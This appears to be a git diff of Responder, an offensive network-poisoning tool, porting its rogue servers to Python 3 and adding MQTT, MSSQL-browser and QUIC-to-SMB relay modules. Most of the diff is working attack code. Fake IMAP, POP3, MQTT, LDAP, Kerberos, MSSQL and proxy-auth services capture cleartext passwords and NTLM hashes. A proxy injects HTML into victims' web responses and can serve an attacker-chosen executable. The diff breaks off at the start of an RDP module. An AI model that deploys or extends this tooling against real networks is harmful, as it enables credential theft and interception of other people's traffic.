+else: + import urlparse + import BaseHTTPServer + import select import zlib -import BaseHTTPServer - from servers.HTTP import RespondWithFile -from utils import * + IgnoredDomains = [ 'crl.comodoca.com', 'crl.usertrust.com', 'ocsp.comodoca.com', 'ocsp.usertrust.com', 'www.download.windowsupdate.com', 'crl.microsoft.com' ] @@ -34,9 +39,9 @@ def InjectData(data, client, req_uri): if settings.Config.Serve_Exe == True and req_uri.endswith('.exe'): return RespondWithFile(client, settings.Config.Exe_Filename, os.path.basename(req_uri)) - if len(data.split('\r\n\r\n')) > 1: + if len(data.split(b'\r\n\r\n')) > 1: try: - Headers, Content = data.split('\r\n\r\n') + Headers, Content = data.split(b'\r\n\r\n') except: return data @@ -44,30 +49,34 @@ def InjectData(data, client, req_uri): if set(RedirectCodes) & set(Headers): return data - if "content-encoding: gzip" in Headers.lower(): + Len = b''.join(re.findall(b'(?<=Content-Length: )[^\r\n]*', Headers)) + + if b'content-encoding: gzip' in Headers.lower(): Content = zlib.decompress(Content, 16+zlib.MAX_WBITS) - if "content-type: text/html" in Headers.lower(): + if b'content-type: text/html' in Headers.lower(): if settings.Config.Serve_Html: # Serve the custom HTML if needed return RespondWithFile(client, settings.Config.Html_Filename) - Len = ''.join(re.findall(r'(?<=Content-Length: )[^\r\n]*', Headers)) - HasBody = re.findall(r'(]*>)', Content) - if HasBody and len(settings.Config.HtmlToInject) > 2: + HasBody = re.findall(b'(]*>)', Content, re.IGNORECASE) + + if HasBody and len(settings.Config.HtmlToInject) > 2 and not req_uri.endswith('.js'): if settings.Config.Verbose: - print text("[PROXY] Injecting into HTTP Response: %s" % color(settings.Config.HtmlToInject, 3, 1)) + print(text("[PROXY] Injecting into HTTP Response: %s" % color(settings.Config.HtmlToInject, 3, 1))) - Content = Content.replace(HasBody[0], '%s\n%s' % (HasBody[0], settings.Config.HtmlToInject)) + Content = Content.replace(HasBody[0], b'%s\n%s' % (HasBody[0], settings.Config.HtmlToInject.encode('latin-1'))) - if "content-encoding: gzip" in Headers.lower(): + if b'content-encoding: gzip' in Headers.lower(): Content = zlib.compress(Content) - Headers = Headers.replace("Content-Length: "+Len, "Content-Length: "+ str(len(Content))) - data = Headers +'\r\n\r\n'+ Content + Headers = Headers.replace(b'Content-Length: '+Len, b'Content-Length: '+ NetworkSendBufferPython2or3(len(Content))) + data = Headers +b'\r\n\r\n'+ Content + else: if settings.Config.Verbose: - print text("[PROXY] Returning unmodified HTTP response") + print(text("[PROXY] Returning unmodified HTTP response")) + return data class ProxySock: @@ -99,14 +108,14 @@ class ProxySock: # Replace the socket by a connection to the proxy self.socket = socket.socket(family, socktype, proto) self.socket.connect(sockaddr) - except socket.error, msg: + except socket.error as msg: if self.socket: self.socket.close() self.socket = None continue break if not self.socket : - raise socket.error, msg + raise socket.error(msg) # Ask him to create a tunnel connection to the target host/port self.socket.send( @@ -121,7 +130,7 @@ class ProxySock: # Not 200 ? if parts[1] != "200": - print color("[!] Error response from upstream proxy: %s" % resp, 1) + print(color("[!] Error response from upstream proxy: %s" % resp, 1)) pass # Wrap all methods of inner socket, without any change @@ -198,9 +207,9 @@ class HTTP_Proxy(BaseHTTPServer.BaseHTTPRequestHandler): rbufsize = 0 def handle(self): - (ip, port) = self.client_address + (ip, port) = self.client_address[0], self.client_address[1] if settings.Config.Verbose: - print text("[PROXY] Received connection from %s" % self.client_address[0]) + print(text("[PROXY] Received connection from %s" % self.client_address[0].replace("::ffff:",""))) self.__base_handle() def _connect_to(self, netloc, soc): @@ -210,7 +219,7 @@ class HTTP_Proxy(BaseHTTPServer.BaseHTTPRequestHandler): else: host_port = netloc, 80 try: soc.connect(host_port) - except socket.error, arg: + except socket.error as arg: try: msg = arg[1] except: msg = arg self.send_error(404, msg) @@ -237,14 +246,15 @@ class HTTP_Proxy(BaseHTTPServer.BaseHTTPRequestHandler): try: if self._connect_to(self.path, soc): - self.wfile.write(self.protocol_version +" 200 Connection established\r\n") - self.wfile.write("Proxy-agent: %s\r\n" % self.version_string()) - self.wfile.write("\r\n") + self.wfile.write(NetworkSendBufferPython2or3(self.protocol_version +" 200 Connection established\r\n")) + self.wfile.write(NetworkSendBufferPython2or3("Proxy-agent: %s\r\n"% self.version_string())) + self.wfile.write(NetworkSendBufferPython2or3("\r\n")) try: self._read_write(soc, 300) except: pass except: + raise pass finally: @@ -271,14 +281,14 @@ class HTTP_Proxy(BaseHTTPServer.BaseHTTPRequestHandler): URL_Unparse = urlparse.urlunparse(('', '', path, params, query, '')) if self._connect_to(netloc, soc): - soc.send("%s %s %s\r\n" % (self.command, URL_Unparse, self.request_version)) + soc.send(NetworkSendBufferPython2or3("%s %s %s\r\n" % (self.command, URL_Unparse, self.request_version))) Cookie = self.headers['Cookie'] if "Cookie" in self.headers else '' if settings.Config.Verbose: - print text("[PROXY] Client : %s" % color(self.client_address[0], 3)) - print text("[PROXY] Requested URL : %s" % color(self.path, 3)) - print text("[PROXY] Cookie : %s" % Cookie) + print(text("[PROXY] Client : %s" % color(self.client_address[0].replace("::ffff:",""), 3))) + print(text("[PROXY] Requested URL : %s" % color(self.path, 3))) + print(text("[PROXY] Cookie : %s" % Cookie)) self.headers['Connection'] = 'close' del self.headers['Proxy-Connection'] @@ -286,8 +296,8 @@ class HTTP_Proxy(BaseHTTPServer.BaseHTTPRequestHandler): del self.headers['Range'] for k, v in self.headers.items(): - soc.send("%s: %s\r\n" % (k.title(), v)) - soc.send("\r\n") + soc.send(NetworkSendBufferPython2or3("%s: %s\r\n" % (k.title(), v))) + soc.send(NetworkSendBufferPython2or3("\r\n")) try: self._read_write(soc, netloc) @@ -325,13 +335,14 @@ class HTTP_Proxy(BaseHTTPServer.BaseHTTPRequestHandler): try: data = i.recv(4096) - if self.command == "POST" and settings.Config.Verbose: - print text("[PROXY] POST Data : %s" % data) + if self.command == b'POST' and settings.Config.Verbose: + print(text("[PROXY] POST Data : %s" % data)) except: pass if data: try: out.send(data) + count = 0 except: pass diff --git a/servers/IMAP.py b/servers/IMAP.py index 765db32..2e6c7ce 100644 --- a/servers/IMAP.py +++ b/servers/IMAP.py @@ -14,36 +14,35 @@ # # You should have received a copy of the GNU General Public License # along with this program. If not, see . +import sys from utils import * -from SocketServer import BaseRequestHandler +if (sys.version_info > (3, 0)): + from socketserver import BaseRequestHandler +else: + from SocketServer import BaseRequestHandler from packets import IMAPGreeting, IMAPCapability, IMAPCapabilityEnd class IMAP(BaseRequestHandler): def handle(self): try: - self.request.send(str(IMAPGreeting())) + self.request.send(NetworkSendBufferPython2or3(IMAPGreeting())) data = self.request.recv(1024) - - if data[5:15] == "CAPABILITY": + if data[5:15] == b'CAPABILITY': RequestTag = data[0:4] - self.request.send(str(IMAPCapability())) - self.request.send(str(IMAPCapabilityEnd(Tag=RequestTag))) + self.request.send(NetworkSendBufferPython2or3(IMAPCapability())) + self.request.send(NetworkSendBufferPython2or3(IMAPCapabilityEnd(Tag=RequestTag.decode("latin-1")))) data = self.request.recv(1024) - if data[5:10] == "LOGIN": - Credentials = data[10:].strip() - + if data[5:10] == b'LOGIN': + Credentials = data[10:].strip().decode("latin-1").split('"') SaveToDb({ 'module': 'IMAP', 'type': 'Cleartext', 'client': self.client_address[0], - 'user': Credentials[0], - 'cleartext': Credentials[1], - 'fullhash': Credentials[0]+":"+Credentials[1], + 'user': Credentials[1], + 'cleartext': Credentials[3], + 'fullhash': Credentials[1]+":"+Credentials[3], }) - ## FIXME: Close connection properly - ## self.request.send(str(ditchthisconnection())) - ## data = self.request.recv(1024) except Exception: pass diff --git a/servers/Kerberos.py b/servers/Kerberos.py index 39a57aa..4605365 100644 --- a/servers/Kerberos.py +++ b/servers/Kerberos.py @@ -14,56 +14,61 @@ # # You should have received a copy of the GNU General Public License # along with this program. If not, see . -from SocketServer import BaseRequestHandler -from utils import * +import codecs import struct +from utils import * +if settings.Config.PY2OR3 == "PY3": + from socketserver import BaseRequestHandler +else: + from SocketServer import BaseRequestHandler + def ParseMSKerbv5TCP(Data): MsgType = Data[21:22] EncType = Data[43:44] MessageType = Data[32:33] - if MsgType == "\x0a" and EncType == "\x17" and MessageType =="\x02": - if Data[49:53] == "\xa2\x36\x04\x34" or Data[49:53] == "\xa2\x35\x04\x33": + if MsgType == b'\x0a' and EncType == b'\x17' and MessageType ==b'\x02': + if Data[49:53] == b'\xa2\x36\x04\x34' or Data[49:53] == b'\xa2\x35\x04\x33': HashLen = struct.unpack('. -from SocketServer import BaseRequestHandler -from packets import LDAPSearchDefaultPacket, LDAPSearchSupportedCapabilitiesPacket, LDAPSearchSupportedMechanismsPacket, LDAPNTLMChallenge +import sys +if (sys.version_info > (3, 0)): + from socketserver import BaseRequestHandler +else: + from SocketServer import BaseRequestHandler +from packets import LDAPSearchDefaultPacket, LDAPSearchSupportedCapabilitiesPacket, LDAPSearchSupportedMechanismsPacket, LDAPNTLMChallenge, CLDAPNetlogon from utils import * import struct +import codecs +import random + +def CalculateDNSName(name): + if isinstance(name, bytes): + name = name.decode('latin-1') + name = name.split(".") + DomainPrefix = struct.pack('B', len(name[0])).decode('latin-1')+name[0] + Dnslen = '' + for x in name: + if len(x) >=1: + Dnslen += struct.pack('B', len(x)).decode('latin-1')+x + + return Dnslen, DomainPrefix + +def ParseCLDAPNetlogon(data): + try: + Dns = data.find(b'DnsDomain') + if Dns == -1: + return False + DnsName = data[Dns+9:] + DnsGuidOff = data.find(b'DomainGuid') + if DnsGuidOff == -1: + return False + Guid = data[DnsGuidOff+10:] + if Dns: + DomainLen = struct.unpack(">B", DnsName[1:2])[0] + DomainName = DnsName[2:2+DomainLen] + + if Guid: + DomainGuidLen = struct.unpack(">B", Guid[1:2])[0] + DomainGuid = Guid[2:2+DomainGuidLen] + return DomainName, DomainGuid + except: + pass + def ParseSearch(data): - if re.search(r'(objectClass)', data): - return str(LDAPSearchDefaultPacket(MessageIDASNStr=data[8:9])) - elif re.search(r'(?i)(objectClass0*.*supportedCapabilities)', data): - return str(LDAPSearchSupportedCapabilitiesPacket(MessageIDASNStr=data[8:9],MessageIDASN2Str=data[8:9])) - elif re.search(r'(?i)(objectClass0*.*supportedSASLMechanisms)', data): - return str(LDAPSearchSupportedMechanismsPacket(MessageIDASNStr=data[8:9],MessageIDASN2Str=data[8:9])) + TID = data[8:9].decode('latin-1') + if re.search(b'Netlogon', data): + NbtName = settings.Config.MachineName + TID = NetworkRecvBufferPython2or3(data[8:10]) + if TID[1] == "\x63": + TID = "\x00"+TID[0] + DomainName, DomainGuid = ParseCLDAPNetlogon(data) + DomainGuid = NetworkRecvBufferPython2or3(DomainGuid) + t = CLDAPNetlogon(MessageIDASNStr=TID ,CLDAPMessageIDStr=TID, NTLogonDomainGUID=DomainGuid, NTLogonForestName=CalculateDNSName(DomainName)[0],NTLogonPDCNBTName=CalculateDNSName(NbtName)[0], NTLogonDomainNBTName=CalculateDNSName(NbtName)[0],NTLogonDomainNameShort=CalculateDNSName(DomainName)[1]) + t.calculate() + return str(t) -def ParseLDAPHash(data, client): - SSPIStart = data[42:] - LMhashLen = struct.unpack(' 10: - LMhashOffset = struct.unpack(' 60: + SMBHash = SSPIString[NthashOffset:NthashOffset+NthashLen] + SMBHash = codecs.encode(SMBHash, 'hex').upper().decode('latin-1') + DomainLen = struct.unpack('i',data[2:6])[0] - MessageSequence = struct.unpack('i',data[11:15])[0] LDAPVersion = struct.unpack('i',data[2:6])[0] + MessageSequence = struct.unpack('i',data[11:15])[0] + LDAPVersion = struct.unpack('. + +from utils import settings, NetworkSendBufferPython2or3, SaveToDb + +if settings.Config.PY2OR3 == "PY3": + from socketserver import BaseRequestHandler +else: + from SocketServer import BaseRequestHandler + +from packets import MQTTv3v4ResponsePacket, MQTTv5ResponsePacket + +#Read N byte integer +def readInt(data, offset, numberOfBytes): + value = int.from_bytes(data[offset:offset+numberOfBytes], 'big') + offset += numberOfBytes + return (value, offset) + +#Read binary data +def readBinaryData(data, offset): + + #Read number of bytes + length, offset = readInt(data, offset, 2) + + #Read bytes + value = data[offset:offset+length] + offset += length + + return (value, offset) + +#Same as readBinaryData() but without reading data +def skipBinaryDataString(data, offset): + length, offset = readInt(data, offset, 2) + offset += length + return offset + +#Read UTF-8 encoded string +def readString(data, offset): + value, offset = readBinaryData(data, offset) + + return (value.decode('utf-8'), offset) + +#Read variable byte integer +#(https://docs.oasis-open.org/mqtt/mqtt/v5.0/os/mqtt-v5.0-os.html#_Toc3901011) +def readVariableByteInteger(data, offset): + multiplier = 1 + value = 0 + while True: + encodedByte = data[offset] + offset += 1 + + value = (encodedByte & 127) * multiplier + + if (multiplier > 128 * 128 * 128): + return None + + multiplier *= 128 + + if(encodedByte & 128 == 0): + break + + return (value, offset) + +class MqttPacket: + + USERNAME_FLAG = 0x80 + PASSWORD_FLAG = 0x40 + WILL_FLAG = 0x04 + + def __init__(self, data): + self.__isValid = True + + controllPacketType, offset = readInt(data, 0, 1) + + #check if CONNECT packet type + if controllPacketType != 0x10: + self.__isValid = False + return + + #Remaining length + remainingLength, offset = readVariableByteInteger(data, offset) + + #Protocol name + protocolName, offset = readString(data, offset) + + #Check protocol name + if protocolName != "MQTT" and protocolName != "MQIsdp": + self.__isValid = False + return + + #Check protocol version + self.__protocolVersion, offset = readInt(data, offset, 1) + + #Read connect flag register + connectFlags, offset = readInt(data, offset, 1) + + #Read keep alive (skip) + offset += 2 + + #MQTTv5 implements properties + if self.__protocolVersion > 4: + + #Skip all properties + propertiesLength, offset = readVariableByteInteger(data, offset) + offset+=propertiesLength + + #Get Client ID + self.clientId, offset = readString(data, offset) + + if (self.clientId == ""): + self.clientId = "" + + #Skip Will + if (connectFlags & self.WILL_FLAG) > 0: + + #MQTT v5 implements properties + if self.__protocolVersion > 4: + willProperties, offset = readVariableByteInteger(data, offset) + + #Skip will properties + offset = skipBinaryDataString(data, offset) + offset = skipBinaryDataString(data, offset) + + #Get Username + if (connectFlags & self.USERNAME_FLAG) > 0: + self.username, offset = readString(data, offset) + else: + self.username = "" + + #Get Password + if (connectFlags & self.PASSWORD_FLAG) > 0: + self.password, offset = readString(data, offset) + else: + self.password = "" + + def isValid(self): + return self.__isValid + + def getProtocolVersion(self): + return self.__protocolVersion + + def data(self, client): + + return { + 'module': 'MQTT', + 'type': 'Cleartext', + 'client': client, + 'hostname': self.clientId, + 'user': self.username, + 'cleartext': self.password, + 'fullhash': self.username + ':' + self.password + } + +class MQTT(BaseRequestHandler): + def handle(self): + + CONTROL_PACKET_TYPE_CONNECT = 0x10 + + try: + data = self.request.recv(2048) + + #Read control packet type + controlPacketType, offset = readInt(data, 0, 1) + + #Skip non CONNECT packets + if controlPacketType != CONTROL_PACKET_TYPE_CONNECT: + return + + #Parse connect packet + packet = MqttPacket(data) + + #Skip if it contains invalid data + if not packet.isValid(): + #Return response + return + + #Send response packet + if packet.getProtocolVersion() < 5: + responsePacket = MQTTv3v4ResponsePacket() + else: + responsePacket = MQTTv5ResponsePacket() + + self.request.send(NetworkSendBufferPython2or3(responsePacket)) + + #Save to DB + SaveToDb(packet.data(self.client_address[0])) + + + except Exception: + self.request.close() + pass diff --git a/servers/MSSQL.py b/servers/MSSQL.py index 3f196f3..5efd26c 100644 --- a/servers/MSSQL.py +++ b/servers/MSSQL.py @@ -14,10 +14,16 @@ # # You should have received a copy of the GNU General Public License # along with this program. If not, see . -from SocketServer import BaseRequestHandler -from packets import MSSQLPreLoginAnswer, MSSQLNTLMChallengeAnswer -from utils import * +import random import struct +import codecs +from utils import * +if settings.Config.PY2OR3 == "PY3": + from socketserver import BaseRequestHandler +else: + from SocketServer import BaseRequestHandler +from packets import MSSQLPreLoginAnswer, MSSQLNTLMChallengeAnswer + class TDS_Login_Packet: def __init__(self, data): @@ -40,7 +46,7 @@ class TDS_Login_Packet: LocaleLen = struct.unpack(' 60: - WriteHash = '%s::%s:%s:%s:%s' % (User, Domain, Challenge.encode('hex'), NTHash[:32], NTHash[32:]) + WriteHash = '%s::%s:%s:%s:%s' % (User, Domain, codecs.encode(Challenge,'hex').decode('latin-1'), NTHash[:32], NTHash[32:]) SaveToDb({ 'module': 'MSSQL', @@ -98,10 +102,10 @@ def ParseSQLHash(data, client, Challenge): def ParseSqlClearTxtPwd(Pwd): Pwd = map(ord,Pwd.replace('\xa5','')) - Pw = '' + Pw = b'' for x in Pwd: - Pw += hex(x ^ 0xa5)[::-1][:2].replace("x", "0").decode('hex') - return Pw + Pw += codecs.decode(hex(x ^ 0xa5)[::-1][:2].replace("x", "0"), 'hex') + return Pw.decode('latin-1') def ParseClearTextSQLPass(data, client): @@ -119,33 +123,64 @@ def ParseClearTextSQLPass(data, client): # MSSQL Server class class MSSQL(BaseRequestHandler): def handle(self): - if settings.Config.Verbose: - print text("[MSSQL] Received connection from %s" % self.client_address[0]) try: + self.ntry = 0 while True: data = self.request.recv(1024) - self.request.settimeout(0.1) - Challenge = RandomChallenge() + self.request.settimeout(1) + Challenge = RandomChallenge() - if data[0] == "\x12": # Pre-Login Message + if not data: + break + if settings.Config.Verbose: + print(text("[MSSQL] Received connection from %s" % self.client_address[0].replace("::ffff:",""))) + if data[0] == b"\x12" or data[0] == 18: # Pre-Login Message Buffer = str(MSSQLPreLoginAnswer()) - self.request.send(Buffer) + self.request.send(NetworkSendBufferPython2or3(Buffer)) data = self.request.recv(1024) - if data[0] == "\x10": # NegoSSP - if re.search("NTLMSSP",data): - Packet = MSSQLNTLMChallengeAnswer(ServerChallenge=Challenge) + if data[0] == b"\x10" or data[0] == 16: # NegoSSP + if re.search(b'NTLMSSP',data): + Packet = MSSQLNTLMChallengeAnswer(ServerChallenge=NetworkRecvBufferPython2or3(Challenge)) Packet.calculate() Buffer = str(Packet) - self.request.send(Buffer) + self.request.send(NetworkSendBufferPython2or3(Buffer)) data = self.request.recv(1024) else: ParseClearTextSQLPass(data,self.client_address[0]) - if data[0] == "\x11": # NegoSSP Auth - ParseSQLHash(data,self.client_address[0]) + if data[0] == b'\x11' or data[0] == 17: # NegoSSP Auth + ParseSQLHash(data,self.client_address[0],Challenge) except: - self.request.close() - pass + pass + +# MSSQL Server Browser class +# See "[MC-SQLR]: SQL Server Resolution Protocol": https://msdn.microsoft.com/en-us/library/cc219703.aspx +class MSSQLBrowser(BaseRequestHandler): + def handle(self): + if settings.Config.Verbose: + print(text("[MSSQL-BROWSER] Received request from %s" % self.client_address[0])) + + data, soc = self.request + + if data: + if data[0] in b'\x02\x03': # CLNT_BCAST_EX / CLNT_UCAST_EX + self.send_response(soc, "MSSQLSERVER") + elif data[0:1] == b'\x04': # CLNT_UCAST_INST + self.send_response(soc, data[1:].rstrip(b"\x00")) + elif data[0:1] == b'\x0F': # CLNT_UCAST_DAC + self.send_dac_response(soc) + + def send_response(self, soc, inst): + print(text("[MSSQL-BROWSER] Sending poisoned response to %s" % self.client_address[0])) + + server_name = ''.join(chr(random.randint(ord('A'), ord('Z'))) for _ in range(random.randint(12, 20))) + resp = "ServerName;%s;InstanceName;%s;IsClustered;No;Version;12.00.4100.00;tcp;1433;;" % (server_name, inst) + soc.sendto(struct.pack(". from utils import * -from SocketServer import BaseRequestHandler -from packets import POPOKPacket +if settings.Config.PY2OR3 == "PY3": + from socketserver import BaseRequestHandler +else: + from SocketServer import BaseRequestHandler +from packets import POPOKPacket,POPNotOKPacket # POP3 Server class class POP3(BaseRequestHandler): def SendPacketAndRead(self): Packet = POPOKPacket() - self.request.send(str(Packet)) + self.request.send(NetworkSendBufferPython2or3(Packet)) return self.request.recv(1024) def handle(self): try: data = self.SendPacketAndRead() - - if data[0:4] == "USER": - User = data[5:].replace("\r\n","") + if data[0:4] == b'CAPA': + self.request.send(NetworkSendBufferPython2or3(POPNotOKPacket())) + data = self.request.recv(1024) + if data[0:4] == b'AUTH': + self.request.send(NetworkSendBufferPython2or3(POPNotOKPacket())) + data = self.request.recv(1024) + if data[0:4] == b'USER': + User = data[5:].strip(b"\r\n").decode("latin-1") data = self.SendPacketAndRead() - if data[0:4] == "PASS": - Pass = data[5:].replace("\r\n","") + if data[0:4] == b'PASS': + Pass = data[5:].strip(b"\r\n").decode("latin-1") SaveToDb({ 'module': 'POP3', diff --git a/servers/Proxy_Auth.py b/servers/Proxy_Auth.py index f83b31e..8bb6c13 100644 --- a/servers/Proxy_Auth.py +++ b/servers/Proxy_Auth.py @@ -14,15 +14,18 @@ # # You should have received a copy of the GNU General Public License # along with this program. If not, see . -import SocketServer -from HTTP import ParseHTTPHash -from packets import * from utils import * +if settings.Config.PY2OR3 == "PY3": + from socketserver import BaseRequestHandler, StreamRequestHandler +else: + from SocketServer import BaseRequestHandler, StreamRequestHandler +from servers.HTTP import ParseHTTPHash +from packets import * def GrabUserAgent(data): UserAgent = re.findall(r'(?<=User-Agent: )[^\r]*', data) - if UserAgent: - print text("[Proxy-Auth] %s" % color("User-Agent : "+UserAgent[0], 2)) + if UserAgent: + print(text("[Proxy-Auth] %s" % color("User-Agent : "+UserAgent[0], 2))) def GrabCookie(data): Cookie = re.search(r'(Cookie:*.\=*)[^\r\n]*', data) @@ -30,8 +33,8 @@ def GrabCookie(data): if Cookie: Cookie = Cookie.group(0).replace('Cookie: ', '') if len(Cookie) > 1: - if settings.Config.Verbose: - print text("[Proxy-Auth] %s" % color("Cookie : "+Cookie, 2)) + if settings.Config.Verbose: + print(text("[Proxy-Auth] %s" % color("Cookie : "+Cookie, 2))) return Cookie return False @@ -41,8 +44,8 @@ def GrabHost(data): if Host: Host = Host.group(0).replace('Host: ', '') - if settings.Config.Verbose: - print text("[Proxy-Auth] %s" % color("Host : "+Host, 2)) + if settings.Config.Verbose: + print(text("[Proxy-Auth] %s" % color("Host : "+Host, 2))) return Host return False @@ -52,36 +55,38 @@ def PacketSequence(data, client, Challenge): Basic_Auth = re.findall(r'(?<=Authorization: Basic )[^\r]*', data) if NTLM_Auth: Packet_NTLM = b64decode(''.join(NTLM_Auth))[8:9] - if Packet_NTLM == "\x01": + if Packet_NTLM == b'\x01': if settings.Config.Verbose: - print text("[Proxy-Auth] Sending NTLM authentication request to %s" % client) - - Buffer = NTLM_Challenge(ServerChallenge=Challenge) + print(text("[Proxy-Auth] Sending NTLM authentication request to %s" % client.replace("::ffff:",""))) + Buffer = NTLM_Challenge(ServerChallenge=NetworkRecvBufferPython2or3(Challenge)) Buffer.calculate() - Buffer_Ans = WPAD_NTLM_Challenge_Ans() - Buffer_Ans.calculate(str(Buffer)) - return str(Buffer_Ans) - if Packet_NTLM == "\x03": + Buffer_Ans = WPAD_NTLM_Challenge_Ans(Payload = b64encode(NetworkSendBufferPython2or3(Buffer)).decode('latin-1')) + return Buffer_Ans + + if Packet_NTLM == b'\x03': NTLM_Auth = b64decode(''.join(NTLM_Auth)) - ParseHTTPHash(NTLM_Auth, Challenge, client, "Proxy-Auth") - GrabUserAgent(data) - GrabCookie(data) - GrabHost(data) - return False #Send a RST with SO_LINGER when close() is called (see Responder.py) + ParseHTTPHash(NTLM_Auth, Challenge, client, "Proxy-Auth") + GrabUserAgent(data) + GrabCookie(data) + GrabHost(data) + #Buffer = IIS_Auth_Granted(Payload=settings.Config.HtmlToInject) #While at it, grab some SMB hashes... + #Buffer.calculate() + #Return a TCP RST, so the client uses direct connection and avoids disruption. + return RST else: - return False + return IIS_Auth_Granted(Payload=settings.Config.HtmlToInject)# Didn't work? no worry, let's grab hashes via SMB... elif Basic_Auth: - GrabUserAgent(data) - GrabCookie(data) - GrabHost(data) - ClearText_Auth = b64decode(''.join(Basic_Auth)) + GrabUserAgent(data) + GrabCookie(data) + GrabHost(data) + ClearText_Auth = b64decode(''.join(Basic_Auth).encode('latin-1')) SaveToDb({ 'module': 'Proxy-Auth', 'type': 'Basic', 'client': client, - 'user': ClearText_Auth.split(':')[0], - 'cleartext': ClearText_Auth.split(':')[1], + 'user': ClearText_Auth.decode('latin-1').split(':')[0], + 'cleartext': ClearText_Auth.decode('latin-1').split(':')[1], }) return False @@ -89,24 +94,51 @@ def PacketSequence(data, client, Challenge): if settings.Config.Basic: Response = WPAD_Basic_407_Ans() if settings.Config.Verbose: - print text("[Proxy-Auth] Sending BASIC authentication request to %s" % client) + print(text("[Proxy-Auth] Sending BASIC authentication request to %s" % client.replace("::ffff:",""))) else: Response = WPAD_Auth_407_Ans() return str(Response) -class Proxy_Auth(SocketServer.BaseRequestHandler): +class Proxy_Auth(BaseRequestHandler): - - def handle(self): + def handle(self): try: - Challenge = RandomChallenge() - for x in range(2): - data = self.request.recv(4096) - self.request.send(PacketSequence(data, self.client_address[0], Challenge)) + Challenge = RandomChallenge() + while True: + self.request.settimeout(3) + remaining = 10*1024*1024 #setting max recieve size + data = '' + while True: + buff = '' + buff = NetworkRecvBufferPython2or3(self.request.recv(8092)) + if buff == '': + break + data += buff + remaining -= len(buff) + #check if we recieved the full header + if data.find('\r\n\r\n') != -1: + #we did, now to check if there was anything else in the request besides the header + if data.find('Content-Length') == -1: + #request contains only header + break + else: + #searching for that content-length field in the header + for line in data.split('\r\n'): + if line.find('Content-Length') != -1: + line = line.strip() + remaining = int(line.split(':')[1].strip()) - len(data) + if remaining <= 0: + break + if data == "": + break + + else: + Buffer = PacketSequence(data,self.client_address[0], Challenge) + self.request.send(NetworkSendBufferPython2or3(Buffer)) except: - pass + pass diff --git a/servers/QUIC.py b/servers/QUIC.py new file mode 100644 index 0000000..a2397f5 --- /dev/null +++ b/servers/QUIC.py @@ -0,0 +1,168 @@ +import asyncio +import logging +import ssl +import argparse +import netifaces +from utils import * +from aioquic.asyncio import serve +from aioquic.asyncio.protocol import QuicConnectionProtocol +from aioquic.quic.configuration import QuicConfiguration +from aioquic.quic.events import QuicEvent, StreamDataReceived, StreamReset, ConnectionTerminated + +BUFFER_SIZE = 11000 + +def get_interface_ip(interface_name): + """Get the IP address of a network interface.""" + try: + # Get address info for the specified interface + addresses = netifaces.ifaddresses(interface_name) + + # Get IPv4 address (AF_INET = IPv4) + if netifaces.AF_INET in addresses: + return addresses[netifaces.AF_INET][0]['addr'] + + # If no IPv4 address, try IPv6 (AF_INET6 = IPv6) + if netifaces.AF_INET6 in addresses: + return addresses[netifaces.AF_INET6][0]['addr'] + + logging.error(f"[!] No IP address found for interface {interface_name}") + return None + except ValueError: + logging.error(f"[!] Interface {interface_name} not found") + return None + + +class QUIC(QuicConnectionProtocol): + def __init__(self, *args, target_address=None, **kwargs): + super().__init__(*args, **kwargs) + self.tcp_connections = {} # stream_id -> (reader, writer) + self.target_address = target_address or "localhost" + + def quic_event_received(self, event): + if isinstance(event, StreamDataReceived): + asyncio.create_task(self.handle_stream_data(event.stream_id, event.data)) + elif isinstance(event, StreamReset) or isinstance(event, ConnectionTerminated): + # Only try to close connections if we have any + if self.tcp_connections: + asyncio.create_task(self.close_all_tcp_connections()) + + async def handle_stream_data(self, stream_id, data): + if stream_id not in self.tcp_connections: + # Create a new TCP connection to the target interface:445 + try: + reader, writer = await asyncio.open_connection(self.target_address, 445) + self.tcp_connections[stream_id] = (reader, writer) + + # Start task to read from TCP and write to QUIC + asyncio.create_task(self.tcp_to_quic(stream_id, reader)) + + logging.info(f"[*] Connected to {self.target_address}:445\n[*] Starting relaying process...") + print(text("[QUIC] Forwarding QUIC connection to SMB server")) + except Exception as e: + logging.error(f"[!] Error connecting to {self.target_address}:445: {e}") + return + + # Forward data from QUIC to TCP + try: + _, writer = self.tcp_connections[stream_id] + writer.write(data) + await writer.drain() + except Exception as e: + logging.error(f"[!] Error writing to TCP: {e}") + await self.close_tcp_connection(stream_id) + + async def tcp_to_quic(self, stream_id, reader): + try: + while True: + data = await reader.read(BUFFER_SIZE) + if not data: + break + + self._quic.send_stream_data(stream_id, data) + self.transmit() + except Exception as e: + logging.error(f"[!] Error reading from TCP: {e}") + finally: + await self.close_tcp_connection(stream_id) + + async def close_tcp_connection(self, stream_id): + if stream_id in self.tcp_connections: + _, writer = self.tcp_connections[stream_id] + writer.close() + await writer.wait_closed() + del self.tcp_connections[stream_id] + + async def close_all_tcp_connections(self): + try: + # Make a copy of the keys to avoid modification during iteration + stream_ids = list(self.tcp_connections.keys()) + for stream_id in stream_ids: + try: + await self.close_tcp_connection(stream_id) + except KeyError: + # Silently ignore if the stream ID no longer exists + pass + except Exception as e: + # Catch any other exceptions that might occur + logging.debug(f"[!] Error closing TCP connections: {e}") + +async def start_quic_server(listen_interface, cert_path, key_path): + # Configure QUIC + configuration = QuicConfiguration( + alpn_protocols=["smb"], + is_client=False, + ) + + # Load certificate and private key + try: + configuration.load_cert_chain(cert_path, key_path) + except Exception as e: + logging.error(f"[!] Could not load {cert_path} and {key_path}: {e}") + return + + # Resolve interfaces to IP addresses + listen_ip = listen_interface + if not is_ip_address(listen_interface): + listen_ip = get_interface_ip(listen_interface) + if not listen_ip: + logging.error(f"[!] Could not resolve IP address for interface {listen_interface}") + return + + target_ip = listen_interface + if not is_ip_address(listen_interface): + target_ip = get_interface_ip(listen_interface) + if not target_ip: + logging.error(f"[!] Could not resolve IP address for interface {listen_interface}") + return + + # Start QUIC server with correct protocol factory + server = await serve( + host=listen_ip, + port=443, + configuration=configuration, + create_protocol=lambda *args, **kwargs: QUIC( + *args, + target_address=target_ip, + **kwargs + ) + ) + + logging.info(f"[*] Started listening on {listen_ip}:443 (UDP)") + logging.info(f"[*] Forwarding connections to {target_ip}:445 (TCP)") + + # Keep the server running forever + await asyncio.Future() + + +def is_ip_address(address): + """Check if a string is a valid IP address.""" + import socket + try: + socket.inet_pton(socket.AF_INET, address) + return True + except socket.error: + try: + socket.inet_pton(socket.AF_INET6, address) + return True + except socket.error: + return False diff --git a/servers/RDP.py b/servers/RDP.py new file mode 100755 index 0000000..3047a4d --- /dev/null +++ b/servers/RDP.py @@ -0,0 +1,146 @@ +#!/usr/bin/env python +# This file is part of Responder, a network 